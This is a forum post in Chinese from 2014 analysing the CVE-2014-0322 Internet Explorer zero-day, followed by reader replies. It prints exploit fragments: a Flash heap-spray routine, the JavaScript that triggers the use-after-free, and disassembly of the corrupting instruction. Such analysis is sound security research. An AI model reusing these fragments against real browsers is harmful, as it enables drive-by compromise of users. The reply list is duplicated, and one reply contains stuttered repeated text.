[原创]CVE-2014-0322 0day Exploit分析-二进制漏洞-看雪-安全社区|安全招聘|kanxue.com

[原创]CVE-2014-0322 0day Exploit分析

发表于: 2014-2-17 10:55 14124

[原创]CVE-2014-0322 0day Exploit分析

古河

2014-2-17 10:55

14124

最近有个IE 0day (CVE-2014-0322)被用于挂马。尽管这个漏洞本身存在于IE里面，但是为了实现成功利用，这个样本还借用了flash作为辅助，来突破各种防护。IE+flash的组合也给分析带来了一些挑战，以前没有分析过这样的组合，正好借此机会详细分析了一下，整理成文章，大家一起交流学习。如有错误之处，还请大家批评指正。

本文涉及的内容包括：
1. 整个exploit的流程分析。
2. 漏洞的成因。
3. 使用flash uint vector进行DEP/ASLR绕过的技术。
4. 样本中的ROP片段。
5. 样本的shellcode行为。

样本网上搜搜都有，我就不发了，不传播恶意软件~

CVE-2014-0322 0day Exploit 分析

古河

http://weibo.com/u/1874932054

最近有个 IE 0day (CVE-2014-0322)被用于挂马。尽管这个漏洞本身存在于 IE 里面，但是为了
实现成功利用，这个样本还借用了 flash 作为辅助，来突破各种防护。IE+flash 的组合也给分
析带来了一些挑战，以前没有分析过这样的组合，正好借此机会详细分析了一下，整理成文
章，大家一起交流学习。如有错误之处，还请大家批评指正。

本文涉及的内容包括：

1. 整个 exploit 的流程分析。

2. 漏洞的成因。

3. 使用 flash uint vector 进行 DEP/ASLR 绕过的技术。

4. 样本中的 ROP 片段。

5. 样本的 shellcode 行为。

１.本文使用的样本

本文使用的样本一共包含三个文件

Index.html (就是那个 html 文件，原名叫什么我忘了)

Tope.swf

Erido.jpg

这些文件在网上搜一下基本都能找到了，我这里就不给出来了。

２.入口点

整个攻击的入口点是 index.html，它会尝试去加载 Tope.swf:

<embed src=Tope.swf width=10 height=10></embed>

３.Tope.swf 加载以及 heap spray

在 Tope.swf 初始化的时候，它首先尝试从服务器获取”Erido.jpg”

_local1.url = "Erido.jpg";
this.l.dataFormat = URLLoaderDataFormat.BINARY;
this.l.addEventListener(Event.COMPLETE, this.E_xx);
this.l.load(_local1);

this.s = new Vector.<Object>(98688);     // totally 98688 vectors to spray
 
var _local7:* = ((0x1000 / 4) - 2);     // each vector has 0x3fe elements

…

while (_local2 < 98688) { 

…
 
this.s[_local2] = new Vector.<uint>(_local7);     // create one of the vectors
 
}

while (_local2 < 0x0400) {
this.ss[_local2] = new Vector.<Object>(_local9);
_local3 = 0;
while (_local3 < _local9) {
this.ss[_local2][_local3] = this.snd;   //初始化成同一个 Sound 对象
_local3++;
};
_local2++;
};

var a=document.getElementsByTagName("script");
var b=a[0]; 
b.onpropertychange=fun;    // 为 script 节 点 设 置 “onpropertychange”
08:45 处理函数
var c=document.createElement('SELECT');    // 创建一个 “select”节点
c=b.appendChild(c);    // 将新创建的 select 节点附加到 script 节点上

[B]MSHTML!CDoc::CreateMarkupFromInfo+0x0000017f    // new CMarkupObject created[/B]
MSHTML!CDoc::CreateMarkupWithElement+0x0000008a
MSHTML!CElement::GetDOMInsertPosition+0x000001c0
MSHTML!CElement::InsertBeforeHelper+0x0000007e
MSHTML!CElement::InsertBeforeHelper+0x000000e5
MSHTML!CElement::InsertBefore+0x00000036
MSHTML!CElement::Var_appendChild+0x000000cb

[B]MSHTML!CMarkup::NotifyElementEnterTree+0x1df
call     CElement::HandleTextChange(bool)[/B]

this.outerHTML=this.outerHTML    // frees the DOM thus frees the CMarkup Object

for(a=0;a<arrLen;++a)
{
g_arr[a].title=d.substring(0,d.length);
}

CMarkup::UpdateMarkupContentsVersion(void)
.text:637C943E
.text:637C943E                      mov      eax, [edx+7Ch]
.text:637C9441                      inc      eax
.text:637C9442                      or       eax, 80000000h
.text:637C9447                      mov      [edx+7Ch], eax
.text:637C944A                      mov      eax, [edx+0ACh]
.text:637C9450                      test      eax, eax
.text:637C9452                      jz          short loc_637C9457
[B].text:637C9454                      inc        dword ptr [eax+10h][/B]

登录后可查看完整内容

[招生]科锐逆向工程师培训(2024年11月15日实地，远程教学同时开班, 第51期)

上传的附件：

CVE-2014-0322 0day Exploit分析.pdf （584.82kb，650次下载）
1.png （21.09kb，5次下载）
2.png （50.11kb，4次下载）
3.png （56.30kb，20次下载）
4.png （103.54kb，5次下载）

收藏・44

免费・5

支持

最新回复 (72) 1 2 3 ▶
zhuliang 雪币： 1098 活跃值： (193) 能力值： (RANK：210 ) 在线值：发帖 36 回帖 401 粉丝 15 关注私信	zhuliang 5 2 楼陈兄又发牛贴，赞一个。我敢保证，不久就被设为精华。 2014-2-17 11:00 0
安于此生雪币： 2664 活跃值： (3401) 能力值： ( LV13，RANK：1760 ) 在线值：发帖 103 回帖 2020 粉丝 199 关注私信	安于此生 34 3 楼顶楼主... 2014-2-17 11:04 0
hrpirip 雪币： 55 活跃值： (519) 能力值： ( LV6，RANK：80 ) 在线值：发帖 48 回帖 407 粉丝 2 关注私信	hrpirip 1 4 楼顶楼主。 2014-2-17 11:06 0
uuwhat 雪币： 29 活跃值： (16) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 150 粉丝 0 关注私信	uuwhat 5 楼跟楼主好好学习！ 2014-2-17 11:08 0
gamehacker 雪币： 131 活跃值： (98) 能力值： ( LV5，RANK：60 ) 在线值：发帖 12 回帖 334 粉丝 2 关注私信	gamehacker 1 6 楼楼主的分析是极好的~ 2014-2-17 11:09 0
仙果雪币： 1491 活跃值： (985) 能力值： (RANK：860 ) 在线值：发帖 68 回帖 1507 粉丝 67 关注私信	仙果 19 7 楼精华是必须的。谢谢古河大牛 2014-2-17 11:30 0
zrhai 雪币： 230 活跃值： (106) 能力值： ( LV2，RANK：10 ) 在线值：发帖 9 回帖 181 粉丝 0 关注私信	zrhai 8 楼正拿到个这类样本，谢谢楼主分享！ 2014-2-17 11:37 0
张jialin 雪币： 90 活跃值： (92) 能力值： ( LV5，RANK：60 ) 在线值：发帖 13 回帖 117 粉丝 2 关注私信	张jialin 1 9 楼我下的样本里面的Erido.jpg没见了。。。多了一个tope.as3文件，不知道各位是在哪里找到样本的？ 2014-2-17 12:04 0
旧信纸雪币： 50 活跃值： (20) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 178 粉丝 1 关注私信	旧信纸 10 楼围观大牛，那么多下载，这么少回复。 2014-2-17 12:08 0
ovenwlm 雪币： 2 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 36 粉丝 0 关注私信	ovenwlm 11 楼膜拜大牛 2014-2-17 12:48 0
TeddyJoy 雪币： 63 活跃值： (57) 能力值： ( LV5，RANK：60 ) 在线值：发帖 2 回帖 12 粉丝 0 关注私信	TeddyJoy 1 12 楼顶，古河大牛！已学习！ 2014-2-17 12:55 0
JoySauce 雪币： 341 活跃值： (85) 能力值： ( LV5，RANK：70 ) 在线值：发帖 6 回帖 185 粉丝 0 关注私信	JoySauce 1 13 楼 mark 2014-2-17 13:40 0
lizhenzhe 雪币： 500 活跃值： (990) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 186 粉丝 0 关注私信	lizhenzhe 14 楼 mark 有空看看，感谢分享 2014-2-17 13:59 0
tishion 雪币： 496 活跃值： (286) 能力值： ( LV13，RANK：400 ) 在线值：发帖 20 回帖 319 粉丝 11 关注私信	tishion 9 15 楼这才是大牛漏洞分析啊，以后得多学习学习现有的CVE了。 2014-2-17 14:21 0
tishion 雪币： 496 活跃值： (286) 能力值： ( LV13，RANK：400 ) 在线值：发帖 20 回帖 319 粉丝 11 关注私信	tishion 9 16 楼有个疑问：这里 CMarkupCMarkup对象已经被释放并站位，运行对象已经被释放并站位，运行对象已经被释放并站位，运行对象已经被释放并站位，运行对象已经被释放并站位，运行对象已经被释放并站位，运行对象已经被释放并站位，运行已经被设置成已经被设置成已经被设置成（可设置成任意值） , 所以这条指令会将所以这条指令会将 1a1b2000处的数据增加 1 这个被inc的地址0x1a1b2000是如何控制的？是不是在CMarkup对象被析构之后，占位的时候填充的字符串？ 2014-2-17 14:41 0
古河雪币： 822 活跃值： (380) 能力值： ( LV12，RANK：310 ) 在线值：发帖 24 回帖 132 粉丝 35 关注私信	古河 6 17 楼是的。。。 2014-2-17 15:11 0
tishion 雪币： 496 活跃值： (286) 能力值： ( LV13，RANK：400 ) 在线值：发帖 20 回帖 319 粉丝 11 关注私信	tishion 9 18 楼 DONE,多谢。 2014-2-17 15:14 0
crackhell 雪币： 100 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 118 粉丝 0 关注私信	crackhell 19 楼顶起。不愧是大牛。写的很详细 2014-2-17 15:29 0
cooolie 雪币： 177 活跃值： (471) 能力值： ( LV2，RANK：10 ) 在线值：发帖 28 回帖 99 粉丝 0 关注私信	cooolie 20 楼学习了～support! 2014-2-17 16:38 0
vessial(xee) 雪币： 4536 活跃值： (902) 能力值： ( LV16，RANK：480 ) 在线值：发帖 28 回帖 126 粉丝 31 关注私信	vessial(xee) 11 21 楼不错不错，分析得很到位啊：） 2014-2-17 16:53 0
惜u雪雪币： 189 活跃值： (46) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 69 粉丝 0 关注私信	惜u雪 22 楼样本难找 2014-2-17 16:57 0
举剑问天雪币： 78 活跃值： (25) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 133 粉丝 0 关注私信	举剑问天 23 楼求样本,分析下谢谢 2014-2-17 17:10 0
惜u雪雪币： 189 活跃值： (46) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 69 粉丝 0 关注私信	惜u雪 24 楼哪位好心人给个样本吧搜了好久都没找到谢谢 2014-2-17 17:43 0
JoenChen 雪币： 6976 活跃值： (1477) 能力值： ( LV11，RANK：180 ) 在线值：发帖 12 回帖 171 粉丝 45 关注私信	JoenChen 4 25 楼写的非常好啊. 深入浅出. 2014-2-18 09:31 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

古河

发帖

132

回帖

310

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

最新回复 (72) 1 2 3 ▶
zhuliang 雪币： 1098 活跃值： (193) 能力值： (RANK：210 ) 在线值：发帖 36 回帖 401 粉丝 15 关注私信	zhuliang 5 2 楼陈兄又发牛贴，赞一个。我敢保证，不久就被设为精华。 2014-2-17 11:00 0
安于此生雪币： 2664 活跃值： (3401) 能力值： ( LV13，RANK：1760 ) 在线值：发帖 103 回帖 2020 粉丝 199 关注私信	安于此生 34 3 楼顶楼主... 2014-2-17 11:04 0
hrpirip 雪币： 55 活跃值： (519) 能力值： ( LV6，RANK：80 ) 在线值：发帖 48 回帖 407 粉丝 2 关注私信	hrpirip 1 4 楼顶楼主。 2014-2-17 11:06 0
uuwhat 雪币： 29 活跃值： (16) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 150 粉丝 0 关注私信	uuwhat 5 楼跟楼主好好学习！ 2014-2-17 11:08 0
gamehacker 雪币： 131 活跃值： (98) 能力值： ( LV5，RANK：60 ) 在线值：发帖 12 回帖 334 粉丝 2 关注私信	gamehacker 1 6 楼楼主的分析是极好的~ 2014-2-17 11:09 0
仙果雪币： 1491 活跃值： (985) 能力值： (RANK：860 ) 在线值：发帖 68 回帖 1507 粉丝 67 关注私信	仙果 19 7 楼精华是必须的。谢谢古河大牛 2014-2-17 11:30 0
zrhai 雪币： 230 活跃值： (106) 能力值： ( LV2，RANK：10 ) 在线值：发帖 9 回帖 181 粉丝 0 关注私信	zrhai 8 楼正拿到个这类样本，谢谢楼主分享！ 2014-2-17 11:37 0
张jialin 雪币： 90 活跃值： (92) 能力值： ( LV5，RANK：60 ) 在线值：发帖 13 回帖 117 粉丝 2 关注私信	张jialin 1 9 楼我下的样本里面的Erido.jpg没见了。。。多了一个tope.as3文件，不知道各位是在哪里找到样本的？ 2014-2-17 12:04 0
旧信纸雪币： 50 活跃值： (20) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 178 粉丝 1 关注私信	旧信纸 10 楼围观大牛，那么多下载，这么少回复。 2014-2-17 12:08 0
ovenwlm 雪币： 2 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 36 粉丝 0 关注私信	ovenwlm 11 楼膜拜大牛 2014-2-17 12:48 0
TeddyJoy 雪币： 63 活跃值： (57) 能力值： ( LV5，RANK：60 ) 在线值：发帖 2 回帖 12 粉丝 0 关注私信	TeddyJoy 1 12 楼顶，古河大牛！已学习！ 2014-2-17 12:55 0
JoySauce 雪币： 341 活跃值： (85) 能力值： ( LV5，RANK：70 ) 在线值：发帖 6 回帖 185 粉丝 0 关注私信	JoySauce 1 13 楼 mark 2014-2-17 13:40 0
lizhenzhe 雪币： 500 活跃值： (990) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 186 粉丝 0 关注私信	lizhenzhe 14 楼 mark 有空看看，感谢分享 2014-2-17 13:59 0
tishion 雪币： 496 活跃值： (286) 能力值： ( LV13，RANK：400 ) 在线值：发帖 20 回帖 319 粉丝 11 关注私信	tishion 9 15 楼这才是大牛漏洞分析啊，以后得多学习学习现有的CVE了。 2014-2-17 14:21 0
tishion 雪币： 496 活跃值： (286) 能力值： ( LV13，RANK：400 ) 在线值：发帖 20 回帖 319 粉丝 11 关注私信	tishion 9 16 楼有个疑问：这里 CMarkupCMarkup对象已经被释放并站位，运行对象已经被释放并站位，运行对象已经被释放并站位，运行对象已经被释放并站位，运行对象已经被释放并站位，运行对象已经被释放并站位，运行对象已经被释放并站位，运行已经被设置成已经被设置成已经被设置成（可设置成任意值） , 所以这条指令会将所以这条指令会将 1a1b2000处的数据增加 1 这个被inc的地址0x1a1b2000是如何控制的？是不是在CMarkup对象被析构之后，占位的时候填充的字符串？ 2014-2-17 14:41 0
古河雪币： 822 活跃值： (380) 能力值： ( LV12，RANK：310 ) 在线值：发帖 24 回帖 132 粉丝 35 关注私信	古河 6 17 楼是的。。。 2014-2-17 15:11 0
tishion 雪币： 496 活跃值： (286) 能力值： ( LV13，RANK：400 ) 在线值：发帖 20 回帖 319 粉丝 11 关注私信	tishion 9 18 楼 DONE,多谢。 2014-2-17 15:14 0
crackhell 雪币： 100 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 118 粉丝 0 关注私信	crackhell 19 楼顶起。不愧是大牛。写的很详细 2014-2-17 15:29 0
cooolie 雪币： 177 活跃值： (471) 能力值： ( LV2，RANK：10 ) 在线值：发帖 28 回帖 99 粉丝 0 关注私信	cooolie 20 楼学习了～support! 2014-2-17 16:38 0
vessial(xee) 雪币： 4536 活跃值： (902) 能力值： ( LV16，RANK：480 ) 在线值：发帖 28 回帖 126 粉丝 31 关注私信	vessial(xee) 11 21 楼不错不错，分析得很到位啊：） 2014-2-17 16:53 0
惜u雪雪币： 189 活跃值： (46) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 69 粉丝 0 关注私信	惜u雪 22 楼样本难找 2014-2-17 16:57 0
举剑问天雪币： 78 活跃值： (25) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 133 粉丝 0 关注私信	举剑问天 23 楼求样本,分析下谢谢 2014-2-17 17:10 0
惜u雪雪币： 189 活跃值： (46) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 69 粉丝 0 关注私信	惜u雪 24 楼哪位好心人给个样本吧搜了好久都没找到谢谢 2014-2-17 17:43 0
JoenChen 雪币： 6976 活跃值： (1477) 能力值： ( LV11，RANK：180 ) 在线值：发帖 12 回帖 171 粉丝 45 关注私信	JoenChen 4 25 楼写的非常好啊. 深入浅出. 2014-2-18 09:31 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复